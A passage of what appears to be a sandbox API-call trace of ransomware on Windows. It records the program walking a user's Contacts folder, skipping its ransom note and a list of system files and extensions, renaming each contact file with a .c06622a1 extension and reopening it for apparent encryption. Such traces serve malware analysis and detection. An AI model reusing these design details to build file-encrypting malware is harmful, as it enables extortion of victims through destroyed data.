Seed=0xf51018 | out: Seed=0xf51018) returned 0x1953c321 [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x786bbe10 [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x206689fd [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e8b13a [0147.411] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d36dd17 [0147.415] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xf93f357f [0147.415] RtlComputeCrc32 (PartialCrc=0x357f, Buffer=0x41f0094, Length=0x80) returned 0x864b9f1a [0147.415] RtlComputeCrc32 (PartialCrc=0x9f1a, Buffer=0x41f0094, Length=0x80) returned 0x14d88163 [0147.415] RtlComputeCrc32 (PartialCrc=0x8163, Buffer=0x41f0094, Length=0x80) returned 0x62294c7b [0147.415] RtlComputeCrc32 (PartialCrc=0x4c7b, Buffer=0x41f0094, Length=0x80) returned 0x2b7c9e1c [0147.415] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0147.415] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.415] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.415] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0147.415] _wcsicmp (_Str1="asdlfk poopvy.contact", _Str2="README.c06622a1.TXT") returned -17 [0147.415] wcsstr (_Str="asdlfk poopvy.contact", _SubStr="README") returned 0x0 [0147.415] _wcsicmp (_Str1="autorun.inf", _Str2="asdlfk poopvy.contact") returned 2 [0147.415] wcslen (_String="autorun.inf") returned 0xb [0147.415] _wcsicmp (_Str1="boot.ini", _Str2="asdlfk poopvy.contact") returned 1 [0147.415] wcslen (_String="boot.ini") returned 0x8 [0147.415] _wcsicmp (_Str1="bootfont.bin", _Str2="asdlfk poopvy.contact") returned 1 [0147.415] wcslen (_String="bootfont.bin") returned 0xc [0147.415] _wcsicmp (_Str1="bootsect.bak", _Str2="asdlfk poopvy.contact") returned 1 [0147.415] wcslen (_String="bootsect.bak") returned 0xc [0147.415] _wcsicmp (_Str1="desktop.ini", _Str2="asdlfk poopvy.contact") returned 3 [0147.415] wcslen (_String="desktop.ini") returned 0xb [0147.415] _wcsicmp (_Str1="iconcache.db", _Str2="asdlfk poopvy.contact") returned 8 [0147.415] wcslen (_String="iconcache.db") returned 0xc [0147.415] _wcsicmp (_Str1="ntldr", _Str2="asdlfk poopvy.contact") returned 13 [0147.415] wcslen (_String="ntldr") returned 0x5 [0147.415] _wcsicmp (_Str1="ntuser.dat", _Str2="asdlfk poopvy.contact") returned 13 [0147.415] wcslen (_String="ntuser.dat") returned 0xa [0147.415] _wcsicmp (_Str1="ntuser.dat.log", _Str2="asdlfk poopvy.contact") returned 13 [0147.415] wcslen (_String="ntuser.dat.log") returned 0xe [0147.415] _wcsicmp (_Str1="ntuser.ini", _Str2="asdlfk poopvy.contact") returned 13 [0147.415] wcslen (_String="ntuser.ini") returned 0xa [0147.415] _wcsicmp (_Str1="thumbs.db", _Str2="asdlfk poopvy.contact") returned 19 [0147.416] wcslen (_String="thumbs.db") returned 0x9 [0147.416] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.416] wcslen (_String="386") returned 0x3 [0147.416] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.416] wcslen (_String="adv") returned 0x3 [0147.416] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.416] wcslen (_String="ani") returned 0x3 [0147.416] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.416] wcslen (_String="bat") returned 0x3 [0147.416] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.416] wcslen (_String="bin") returned 0x3 [0147.416] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.416] wcslen (_String="cab") returned 0x3 [0147.416] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.416] wcslen (_String="cmd") returned 0x3 [0147.416] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.416] wcslen (_String="com") returned 0x3 [0147.416] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.416] wcslen (_String="cpl") returned 0x3 [0147.416] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.416] wcslen (_String="cur") returned 0x3 [0147.416] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.416] wcslen (_String="deskthemepack") returned 0xd [0147.416] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.416] wcslen (_String="diagcab") returned 0x7 [0147.416] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.416] wcslen (_String="diagcfg") returned 0x7 [0147.416] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.416] wcslen (_String="diagpkg") returned 0x7 [0147.416] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.416] wcslen (_String="dll") returned 0x3 [0147.416] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.416] wcslen (_String="drv") returned 0x3 [0147.416] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.416] wcslen (_String="exe") returned 0x3 [0147.416] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.416] wcslen (_String="hlp") returned 0x3 [0147.417] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.417] wcslen (_String="icl") returned 0x3 [0147.417] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.417] wcslen (_String="icns") returned 0x4 [0147.417] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.417] wcslen (_String="ico") returned 0x3 [0147.417] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.417] wcslen (_String="ics") returned 0x3 [0147.417] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.417] wcslen (_String="idx") returned 0x3 [0147.417] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.417] wcslen (_String="ldf") returned 0x3 [0147.417] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.417] wcslen (_String="lnk") returned 0x3 [0147.417] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.417] wcslen (_String="mod") returned 0x3 [0147.417] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.417] wcslen (_String="mpa") returned 0x3 [0147.417] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.417] wcslen (_String="msc") returned 0x3 [0147.417] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.417] wcslen (_String="msp") returned 0x3 [0147.417] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.417] wcslen (_String="msstyles") returned 0x8 [0147.417] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.417] wcslen (_String="msu") returned 0x3 [0147.417] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.417] wcslen (_String="nls") returned 0x3 [0147.417] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.417] wcslen (_String="nomedia") returned 0x7 [0147.417] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.417] wcslen (_String="ocx") returned 0x3 [0147.417] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.417] wcslen (_String="prf") returned 0x3 [0147.417] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.417] wcslen (_String="ps1") returned 0x3 [0147.417] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.417] wcslen (_String="rom") returned 0x3 [0147.417] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.418] wcslen (_String="rtp") returned 0x3 [0147.418] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.418] wcslen (_String="scr") returned 0x3 [0147.418] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.418] wcslen (_String="shs") returned 0x3 [0147.418] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.418] wcslen (_String="spl") returned 0x3 [0147.418] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.418] wcslen (_String="sys") returned 0x3 [0147.418] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.418] wcslen (_String="theme") returned 0x5 [0147.418] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.418] wcslen (_String="themepack") returned 0x9 [0147.418] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.418] wcslen (_String="wpx") returned 0x3 [0147.418] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.418] wcslen (_String="lock") returned 0x4 [0147.418] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.418] wcslen (_String="key") returned 0x3 [0147.418] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.418] wcslen (_String="hta") returned 0x3 [0147.418] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.418] wcslen (_String="msi") returned 0x3 [0147.418] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.418] wcslen (_String="pdb") returned 0x3 [0147.418] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.418] wcslen (_String="sql") returned 0x3 [0147.418] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.418] wcslen (_String="sqlite") returned 0x6 [0147.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.418] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.418] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.418] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.418] wcscpy (in: _Dest=0x44d00ce, _Source="asdlfk poopvy.contact" | out: _Dest="asdlfk poopvy.contact") returned="asdlfk poopvy.contact" [0147.419] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", dwFileAttributes=0x80) returned 1 [0147.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0147.419] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.419] ReadFile (in: hFile=0x618, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.421] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x3cba81d0 [0147.421] RtlComputeCrc32 (PartialCrc=0x81d0, Buffer=0x3feb74, Length=0x80) returned 0xfcc5be30 [0147.421] RtlComputeCrc32 (PartialCrc=0xbe30, Buffer=0x3feb74, Length=0x80) returned 0x292e0b8f [0147.421] RtlComputeCrc32 (PartialCrc=0xb8f, Buffer=0x3feb74, Length=0x80) returned 0x2999dd3a [0147.421] RtlComputeCrc32 (PartialCrc=0xdd3a, Buffer=0x3feb74, Length=0x80) returned 0x1b33dbfa [0147.421] CloseHandle (hObject=0x618) returned 1 [0147.421] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.421] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0147.421] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 0x40 [0147.421] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.421] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0147.424] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.424] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3f8e69a9 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b53d6b7 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a66c2d3 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15c12018 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c6a882 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d04329d [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72247418 [0147.429] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x703dbe80 [0147.432] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x24c82e52 [0147.432] RtlComputeCrc32 (PartialCrc=0x2e52, Buffer=0x4280094, Length=0x80) returned 0xfeb9ab30 [0147.432] RtlComputeCrc32 (PartialCrc=0xab30, Buffer=0x4280094, Length=0x80) returned 0x8cba619f [0147.432] RtlComputeCrc32 (PartialCrc=0x619f, Buffer=0x4280094, Length=0x80) returned 0x1c5bd36c [0147.432] RtlComputeCrc32 (PartialCrc=0xd36c, Buffer=0x4280094, Length=0x80) returned 0x86b791a9 [0147.432] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0147.432] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.432] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.432] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0147.432] _wcsicmp (_Str1="chucu jadnvk.contact", _Str2="README.c06622a1.TXT") returned -15 [0147.432] wcsstr (_Str="chucu jadnvk.contact", _SubStr="README") returned 0x0 [0147.432] _wcsicmp (_Str1="autorun.inf", _Str2="chucu jadnvk.contact") returned -2 [0147.432] wcslen (_String="autorun.inf") returned 0xb [0147.432] _wcsicmp (_Str1="boot.ini", _Str2="chucu jadnvk.contact") returned -1 [0147.432] wcslen (_String="boot.ini") returned 0x8 [0147.432] _wcsicmp (_Str1="bootfont.bin", _Str2="chucu jadnvk.contact") returned -1 [0147.432] wcslen (_String="bootfont.bin") returned 0xc [0147.432] _wcsicmp (_Str1="bootsect.bak", _Str2="chucu jadnvk.contact") returned -1 [0147.432] wcslen (_String="bootsect.bak") returned 0xc [0147.432] _wcsicmp (_Str1="desktop.ini", _Str2="chucu jadnvk.contact") returned 1 [0147.432] wcslen (_String="desktop.ini") returned 0xb [0147.432] _wcsicmp (_Str1="iconcache.db", _Str2="chucu jadnvk.contact") returned 6 [0147.432] wcslen (_String="iconcache.db") returned 0xc [0147.432] _wcsicmp (_Str1="ntldr", _Str2="chucu jadnvk.contact") returned 11 [0147.432] wcslen (_String="ntldr") returned 0x5 [0147.433] _wcsicmp (_Str1="ntuser.dat", _Str2="chucu jadnvk.contact") returned 11 [0147.433] wcslen (_String="ntuser.dat") returned 0xa [0147.433] _wcsicmp (_Str1="ntuser.dat.log", _Str2="chucu jadnvk.contact") returned 11 [0147.433] wcslen (_String="ntuser.dat.log") returned 0xe [0147.433] _wcsicmp (_Str1="ntuser.ini", _Str2="chucu jadnvk.contact") returned 11 [0147.433] wcslen (_String="ntuser.ini") returned 0xa [0147.433] _wcsicmp (_Str1="thumbs.db", _Str2="chucu jadnvk.contact") returned 17 [0147.433] wcslen (_String="thumbs.db") returned 0x9 [0147.433] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.433] wcslen (_String="386") returned 0x3 [0147.433] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.433] wcslen (_String="adv") returned 0x3 [0147.433] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.433] wcslen (_String="ani") returned 0x3 [0147.433] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.433] wcslen (_String="bat") returned 0x3 [0147.433] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.433] wcslen (_String="bin") returned 0x3 [0147.433] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.433] wcslen (_String="cab") returned 0x3 [0147.433] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.433] wcslen (_String="cmd") returned 0x3 [0147.433] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.433] wcslen (_String="com") returned 0x3 [0147.433] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.433] wcslen (_String="cpl") returned 0x3 [0147.433] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.433] wcslen (_String="cur") returned 0x3 [0147.433] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.433] wcslen (_String="deskthemepack") returned 0xd [0147.433] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.433] wcslen (_String="diagcab") returned 0x7 [0147.433] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.433] wcslen (_String="diagcfg") returned 0x7 [0147.433] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.433] wcslen (_String="diagpkg") returned 0x7 [0147.433] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.434] wcslen (_String="dll") returned 0x3 [0147.434] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.434] wcslen (_String="drv") returned 0x3 [0147.434] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.434] wcslen (_String="exe") returned 0x3 [0147.434] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.434] wcslen (_String="hlp") returned 0x3 [0147.434] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.434] wcslen (_String="icl") returned 0x3 [0147.434] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.434] wcslen (_String="icns") returned 0x4 [0147.434] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.434] wcslen (_String="ico") returned 0x3 [0147.434] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.434] wcslen (_String="ics") returned 0x3 [0147.434] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.434] wcslen (_String="idx") returned 0x3 [0147.434] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.434] wcslen (_String="ldf") returned 0x3 [0147.434] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.434] wcslen (_String="lnk") returned 0x3 [0147.434] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.434] wcslen (_String="mod") returned 0x3 [0147.434] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.435] wcslen (_String="mpa") returned 0x3 [0147.435] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.435] wcslen (_String="msc") returned 0x3 [0147.435] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.435] wcslen (_String="msp") returned 0x3 [0147.435] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.435] wcslen (_String="msstyles") returned 0x8 [0147.435] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.435] wcslen (_String="msu") returned 0x3 [0147.435] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.435] wcslen (_String="nls") returned 0x3 [0147.435] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.435] wcslen (_String="nomedia") returned 0x7 [0147.435] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.435] wcslen (_String="ocx") returned 0x3 [0147.435] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.435] wcslen (_String="prf") returned 0x3 [0147.435] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.435] wcslen (_String="ps1") returned 0x3 [0147.435] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.435] wcslen (_String="rom") returned 0x3 [0147.435] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.435] wcslen (_String="rtp") returned 0x3 [0147.435] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.435] wcslen (_String="scr") returned 0x3 [0147.435] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.435] wcslen (_String="shs") returned 0x3 [0147.435] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.435] wcslen (_String="spl") returned 0x3 [0147.435] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.435] wcslen (_String="sys") returned 0x3 [0147.435] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.435] wcslen (_String="theme") returned 0x5 [0147.435] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.435] wcslen (_String="themepack") returned 0x9 [0147.435] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.435] wcslen (_String="wpx") returned 0x3 [0147.435] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.436] wcslen (_String="lock") returned 0x4 [0147.436] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.436] wcslen (_String="key") returned 0x3 [0147.436] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.436] wcslen (_String="hta") returned 0x3 [0147.436] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.436] wcslen (_String="msi") returned 0x3 [0147.436] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.436] wcslen (_String="pdb") returned 0x3 [0147.436] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.436] wcslen (_String="sql") returned 0x3 [0147.436] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.436] wcslen (_String="sqlite") returned 0x6 [0147.436] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.436] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.436] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.436] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.436] wcscpy (in: _Dest=0x44d00ce, _Source="chucu jadnvk.contact" | out: _Dest="chucu jadnvk.contact") returned="chucu jadnvk.contact" [0147.436] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", dwFileAttributes=0x80) returned 1 [0147.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0147.436] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.436] ReadFile (in: hFile=0x61c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.438] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x856ae0af [0147.438] RtlComputeCrc32 (PartialCrc=0xe0af, Buffer=0x3feb74, Length=0x80) returned 0x7132f7ca [0147.438] RtlComputeCrc32 (PartialCrc=0xf7ca, Buffer=0x3feb74, Length=0x80) returned 0x9922324d [0147.438] RtlComputeCrc32 (PartialCrc=0x324d, Buffer=0x3feb74, Length=0x80) returned 0xc8b7386e [0147.438] RtlComputeCrc32 (PartialCrc=0x386e, Buffer=0x3feb74, Length=0x80) returned 0xd685909 [0147.438] CloseHandle (hObject=0x61c) returned 1 [0147.438] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.438] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0147.439] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 0x3f [0147.439] wcscpy (in: _Dest=0x44e00fe, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.439] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 